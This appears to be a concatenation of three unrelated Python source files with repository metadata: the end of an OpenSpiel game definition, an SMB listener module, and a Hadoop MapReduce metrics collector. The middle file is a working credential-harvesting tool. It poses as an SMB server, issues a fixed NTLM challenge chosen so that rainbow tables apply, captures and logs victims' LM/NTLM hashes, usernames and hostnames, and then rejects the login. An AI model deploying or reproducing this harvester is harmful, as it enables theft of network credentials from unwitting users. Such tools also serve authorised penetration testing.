if go_to_bar and not crowded:
pt[idx] = G
elif go_to_bar and crowded:
pt[idx] = B
else:
pt[idx] = S
super().__init__(pt, seed)
|
deepmind/open_spiel
|
open_spiel/python/algorithms/adidas_utils/games/big.py
|
Python
|
apache-2.0
| 4,268 | 0.005155 |
import socket
import struct
import sys
import util
from threading import Thread
from service import Service
class smb(Service):
def __init__(self):
super(smb, self).__init__('SMB Service')
self.config['port'].value = 445
self.captured_hashes = {}
self.info = """
SMB listener for harvesting NTLM/LM hashes.
Authentication requests use the standard challenge of
1122334455667788, for which plenty of generated rainbow
tables exist already.
"""
# parse NTLM/LM hashes
# scapy has very limited SMB packet support, so we have to do this manually
def parse_credentials(self, data):
# offsets based on security blob starting at data[59]
data = data[59:]
lm_offset = struct.unpack('<I', data[16:20])[0]
ntlm_offset = struct.unpack('<I', data[24:28])[0]
name_length = struct.unpack('<h', data[36:38])[0]
name_offset = struct.unpack('<I', data[40:44])[0]
host_length = struct.unpack('<h', data[46:48])[0]
host_offset = struct.unpack('<I', data[48:52])[0]
lm_hash = ntlm_hash = ''
# LM hash
for i in data[lm_offset:lm_offset + 24]:
tmp = str(hex(ord(i))).replace('0x', '')
if len(tmp) is 1:
# hex() removes leading 0's in hex; we need them.
tmp = '0' + tmp
lm_hash += tmp
# NTLM hash
for i in data[ntlm_offset:ntlm_offset + 24]:
tmp = str(hex(ord(i))).replace('0x', '')
if len(tmp) is 1:
tmp = '0' + tmp
ntlm_hash += tmp
# host name
hname = ''
for i in range(host_offset, (host_offset + host_length)):
tmp = struct.unpack('<c', data[i])[0]
if tmp is '\x00':
continue
hname += tmp
if name_length > 100:
# sanity
return
# user name
uname = ''
for i in range(name_offset, (name_offset + name_length)):
tmp = struct.unpack('<c', data[i])[0]
if tmp is '\x00':
# null bytes
continue
uname += tmp
# add the username and build the list
# list consists of
# HOST NAME
# LM HASH
# NTLM HASH
if not uname in self.captured_hashes:
tmp = [hname, lm_hash.upper(), ntlm_hash.upper()]
self.captured_hashes[uname] = tmp
data = 'Username: %s\nHost: %s\nLM: %s\nNTLM: %s\nChallenge: %s\n' \
% (uname, hname, lm_hash.upper(),
ntlm_hash.upper(), '1122334455667788')
self.log_msg(data)
# get packet payload
def get_payload(self, data):
hexcode = str(hex(ord(data[4])))
if hexcode == '0x72':
# Build the payload for a Negotiate Protocol Response
# netbios
payload = "\x00\x00\x00\x55"
# smb header
payload += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8"
payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
payload += "\xff\xff\xff\xfe\x00\x00\x00\x00"
# negotiate protocol response
payload += "\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00"
payload += "\x00\x00\x01\x00\x00\x00\x00\x00\xfd\xe3\x00\x80"
payload += "\x11\xb9\x14\xe4\x77\xc8\xcd\x01\x68\x01\x00\x10"
payload += "\x00\xb5\x9b\x73\x9d\xb7\xc2\xb7\x40\x83\xd6\x52"
payload += "\x31\xec\xb3\x84\x53"
return (payload, 0)
elif hexcode == '0x73':
# check if its a NEGOTIATE or AUTH
message_type = str(hex(ord(data[67])))
if message_type == '0x1':
# Build the payload for a NTLMSSP_CHALLENGE
# netbios
payload = "\x00\x00\x00\xdd"
# smb header
payload += "\xff\x53\x4d\x42\x73\x16"
payload += "\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00\x00"
payload += "\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
payload += "\x00\x08\x10\x00"
# session setup andx response, error more processing
payload += "\x04\xff\x00\xdd\x00\x00\x00\x68\x00\xb2\x00"
payload += "\x4e\x54\x4c\x4d\x53\x53\x50\x00\x02\x00\x00"
payload += "\x00\x04\x00\x04\x00\x38\x00\x00\x00\x15\x82"
payload += "\x8a\xe2\x11\x22\x33\x44\x55\x66\x77\x88\x00" #ntlm challenge 1122334455667788
payload += "\x00\x00\x00\x00\x00\x00\x00\x2c\x00\x2c\x00"
payload += "\x3c\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00"
payload += "\x0f\x4e\x00\x4f\x00\x02\x00\x04\x00\x4e\x00"
payload += "\x4f\x00\x01\x00\x04\x00\x4e\x00\x4f\x00\x04"
payload += "\x00\x04\x00\x6e\x00\x6f\x00\x03\x00\x04\x00"
payload += "\x6e\x00\x6f\x00\x06\x00\x04\x00\x01\x00\x00"
payload += "\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e"
payload += "\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00"
payload += "\x35\x00\x2e\x00\x31\x00\x00\x00\x57\x00\x69"
payload += "\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00"
payload += "\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20"
payload += "\x00\x4c\x00\x41\x00\x4e\x00\x20\x00\x4d\x00"
payload += "\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72"
payload += "\x00\x00"
return (payload, 0)
elif message_type == '0x3':
# should be an AUTH packet
# parse credentials
self.parse_credentials(data)
# send a STATUS_LOGIN_FAILURE
# netbios
payload = "\x00\x00\x00\x23"
# smb header
payload += "\xff\x53\x4d\x42\x73\x6d\x00\x00\xc0\x98\x07"
payload += "\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
payload += "\x00\x00\xff\xff\xff\xfe\x00\x08\x20\x00"
# session setup andx response, status_login_failure
payload += "\x00\x00\x00"
return (payload, 1)
else:
return (None, 1)
# dbg -- dump the packet
def dbg_dump(self, data):
cnt = 0
for i in data:
sys.stdout.write(str(hex(ord(i))) + ' ')
cnt += 1
if cnt % 16 == 0:
print ''
cnt = 0
print ''
# handle packets
def handler(self, con, data):
try:
if len(data) > 4:
data = data[4:]
(payload, err) = self.get_payload(data)
if not payload is None and err is 0:
con.send(payload)
elif not payload is None and err is 1:
con.send(payload)
return False
else:
return False
except Exception, j:
util.Error('SMB error: %s' % j)
return False
return True
# threaded init
def initialize_bg(self):
util.Msg('Starting SMB listener...')
thread = Thread(target=self.initialize)
thread.start()
return True
# initialize SMB listener
def initialize(self):
socker = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socker.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
socker.settimeout(3)
socker.bind(('', self.config['port'].value))
socker.listen(5)
self.running = True
try:
while self.running:
try:
con, addr = socker.accept()
except KeyboardInterrupt:
break
except:
continue
self.log_msg('Connection from %s' % addr[0])
while self.running:
data = con.recv(256)
if not self.handler(con, data):
break
con.shutdown(socket.SHUT_RDWR)
con.close()
self.log_msg('Closed connection with %s.\n' % addr[0])
except KeyboardInterrupt:
self.running = False
except socket.error:
pass
except Exception, j:
util.Error('Error with SMB listener: %s' % j)
self.running = False
socker.close()
util.debug('SMB listener shutdown.')
def cli(self, parser):
""" initialize CLI options
"""
parser.add_argument('--smb', help='SMB Service', action='store_true',
default=False, dest=self.which)
|
bacemtayeb/Tierra
|
src/modules/services/smb.py
|
Python
|
gpl-3.0
| 8,923 | 0.001121 |
import time
import requests
from collectors.lib import utils
from collectors.lib.collectorbase import CollectorBase
# reference by https://hadoop.apache.org/docs/r2.7.2/hadoop-mapreduce-client/hadoop-mapreduce-client-core/MapredAppMasterRest.html
REST_API = {"YARN_APPS_PATH": "ws/v1/cluster/apps",
"MAPREDUCE_JOBS_PATH": "ws/v1/mapreduce/jobs"}
# response form 'ws/v1/mapreduce/jobs'
# {
# "jobs": {
# "job": [
# {
# "startTime": 1453761316277,
# "finishTime": 0,
# "elapsedTime": 99221829,
# "id": "job_1453738555560_0001",
# "name": "WordCount",
# "user": "vagrant",
# "state": "RUNNING",
# "mapsTotal": 1,
# "mapsCompleted": 0,
# "reducesTotal": 1,
# "reducesCompleted": 0,
# "mapProgress": 48.335266,
# "reduceProgress": 0.0,
# "mapsPending": 0,
# "mapsRunning": 1,
# "reducesPending": 1,
# "reducesRunning": 0,
# "uberized": false,
# "diagnostics": "",
# "newReduceAttempts": 1,
# "runningReduceAttempts": 0,
# "failedReduceAttempts": 0,
# "killedReduceAttempts": 0,
# "successfulReduceAttempts": 0,
# "newMapAttempts": 0,
# "runningMapAttempts": 1,
# "failedMapAttempts": 1,
# "killedMapAttempts": 0,
# "successfulMapAttempts": 0
# }
# ]
# }
# }
JOB = ['elapsedTime', 'mapsTotal', 'mapsCompleted', 'reducesTotal', 'reducesCompleted', 'mapsPending', 'mapsRunning', 'reducesPending', 'reducesRunning', 'newReduceAttempts', 'runningReduceAttempts',
'failedReduceAttempts', 'killedReduceAttempts', 'successfulReduceAttempts', 'newMapAttempts', 'runningMapAttempts', 'failedMapAttempts', 'killedMapAttempts', 'successfulMapAttempts']
# form 'http://localhost:8088/proxy/application_1453738555560_0001/ws/v1/mapreduce/jobs/application_1453738555560_0001/counters'
# {
# "jobCounters": {
# "id": "job_1453738555560_0001",
# "counterGroup": [
# {
# "counterGroupName": "org.apache.hadoop.mapreduce.FileSystemCounter",
# "counter": [
# {
# "name": "FILE_BYTES_READ",
# "totalCounterValue": 0,
# "mapCounterValue": 1,
# "reduceCounterValue": 2
# },
# {
# "name": "FILE_BYTES_WRITTEN",
# "totalCounterValue": 3,
# "mapCounterValue": 4,
# "reduceCounterValue": 5
# }
# ]
# }
# ]
# }
# }
JOB_COUNTER = ['reduceCounterValue', 'mapCounterValue', 'totalCounterValue']
# form 'http://localhost:8088/proxy/application_1453738555560_0001/ws/v1/mapreduce/jobs/application_1453738555560_0001/tasks'
# {
# "tasks": {
# "task": [
# {
# "startTime": 1453761318527,
# "finishTime": 0,
# "elapsedTime": 99869037,
# "progress": 49.11076,
# "id": "task_1453738555560_0001_m_000000",
# "state": "RUNNING",
# "type": "MAP",
# "successfulAttempt": "",
# "status": "map > map"
# }
# ]
# }
# }
class MapReduce(CollectorBase):
def __init__(self, config, logger, readq):
super(MapReduce, self).__init__(config, logger, readq)
self.port = self.get_config('port', 8080)
self.host = self.get_config('host', "localhost")
self.http_prefix = 'http://%s:%s' % (self.host, self.port)
def __call__(self):
try:
running_apps = self._get_running_app_ids()
running_jobs = self._mapreduce_job_metrics(running_apps)
self._mapreduce_job_counters_metrics(running_jobs)
self._mapreduce_task_metrics(running_jobs)
self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '0'))
except Exception as e:
self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1'))
self.log_exception('exception collecting mapreduce metrics %s' % e)
def _get_running_app_ids(self):
try:
running_apps = {}
metrics_json = self.request("/%s?%s" % (REST_API['YARN_APPS_PATH'], "states=RUNNING&applicationTypes=MAPREDUCE"))
if metrics_json.get('apps'):
if metrics_json['apps'].get('app') is not None:
for app_json in metrics_json['apps']['app']:
app_id = app_json.get('id')
tracking_url = app_json.get('trackingUrl')
app_name = app_json.get('name')
if app_id and tracking_url and app_name:
running_apps[app_id] = (app_name, tracking_url)
except Exception as e:
self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1'))
self.log_exception('exception collecting yarn apps metric for mapreduce \n %s',e)
return running_apps
def _mapreduce_job_metrics(self, running_apps):
'''
Get metrics for each MapReduce job.
Return a dictionary for each MapReduce job
{
job_id: {
'job_name': job_name,
'app_name': app_name,
'user_name': user_name,
'tracking_url': tracking_url
}
'''
try:
running_jobs = {}
for app_id, (app_name, tracking_url) in running_apps.iteritems():
ts = time.time()
metrics_json = self.request_url("%s%s" % (tracking_url,REST_API['MAPREDUCE_JOBS_PATH']))
if metrics_json.get('jobs'):
if metrics_json['jobs'].get('job'):
for job_json in metrics_json['jobs']['job']:
job_id = job_json.get('id')
job_name = job_json.get('name')
user_name = job_json.get('user')
if job_id and job_name and user_name:
# Build the structure to hold the information for each job ID
running_jobs[str(job_id)] = {'job_name': str(job_name),
'app_name': str(app_name),
'user_name': str(user_name),
'tracking_url': "%s%s/%s" % (tracking_url, REST_API['MAPREDUCE_JOBS_PATH'], job_id)}
for metric in JOB:
self._readq.nput('mapreduce.job.%s %d %d app_name=%s user_name=%s job_name=%s' % (metric, ts, job_json[metric], utils.remove_invalid_characters(str(app_name)), utils.remove_invalid_characters(str(user_name)), utils.remove_invalid_characters(str(job_name))))
except Exception as e:
self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1'))
self.log_exception('exception collecting mapreduce jobs metric \n %s',e)
return running_jobs
def _mapreduce_job_counters_metrics(self, running_jobs):
'''
Get custom metrics specified for each counter
'''
try:
for job_id, job_metrics in running_jobs.iteritems():
ts = time.time()
job_name = job_metrics['job_name']
if job_name:
metrics_json = self.request_url("%s%s" % (job_metrics['tracking_url'],'/counters'))
if metrics_json.get('jobCounters'):
if metrics_json['jobCounters'].get('counterGroup'):
for counter_group in metrics_json['jobCounters']['counterGroup']:
group_name = counter_group.get('counterGroupName')
if group_name:
if counter_group.get('counter'):
for counter in counter_group['counter']:
counter_name = counter.get('name')
for metric in JOB_COUNTER:
self._readq.nput('mapreduce.job.counter.%s %d %d app_name=%s user_name=%s job_name=%s counter_name=%s' % (metric, ts, counter[metric], utils.remove_invalid_characters(job_metrics.get('app_name')), utils.remove_invalid_characters(job_metrics.get('user_name')), utils.remove_invalid_characters(job_name), utils.remove_invalid_characters(str(counter_name).lower())))
except Exception as e:
self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1'))
self.log_exception('exception collecting mapreduce jobs counter metric \n %s',e)
def _mapreduce_task_metrics(self, running_jobs):
'''
Get metrics for each MapReduce task
Return a dictionary of {task_id: 'tracking_url'} for each MapReduce task
'''
try:
for job_id, job_stats in running_jobs.iteritems():
ts = time.time()
metrics_json = self.request_url("%s%s" % (job_stats['tracking_url'],'/tasks'))
if metrics_json.get('tasks'):
if metrics_json['tasks'].get('task'):
for task in metrics_json['tasks']['task']:
task_type = task.get('type')
if task_type:
if task_type == 'MAP':
self._readq.nput('mapreduce.job.map.task.progress %d %d app_name=%s user_name=%s job_name=%s task_type=%s' % (ts, task['progress'], utils.remove_invalid_characters(job_stats.get('app_name')), utils.remove_invalid_characters(job_stats.get('user_name')), utils.remove_invalid_characters(job_stats.get('job_name')), utils.remove_invalid_characters(str(task_type).lower())))
elif task_type == 'REDUCE':
self._readq.nput('mapreduce.job.reduce.task.progress %d %d app_name=%s user_name=%s job_name=%s task_type=%s' % (ts, task['progress'], utils.remove_invalid_characters(job_stats.get('app_name')), utils.remove_invalid_characters(job_stats.get('user_name')), utils.remove_invalid_characters(job_stats.get('job_name')), utils.remove_invalid_characters(str(task_type).lower())))
except Exception as e:
self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1'))
self.log_exception('exception collecting mapreduce task metric \n %s',e)
def request(self,uri):
resp = requests.get('%s%s' % (self.http_prefix, uri))
if resp.status_code != 200:
raise HTTPError('%s%s' % (self.http_prefix, uri))
return resp.json()
def request_url(self, url):
resp = requests.get(url)
if resp.status_code != 200:
if resp.status_code > 500:
self.log_exception("mapreduce collector can not access url : %s" % url)
raise HTTPError(url)
return resp.json()
class HTTPError(RuntimeError):
def __init__(self, resp):
RuntimeError.__init__(self, str(resp))
self.resp = resp
|
wangy1931/tcollector
|
collectors/builtin/map_reduce.py
|
Python
|
lgpl-3.0
| 11,834 | 0.003634 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.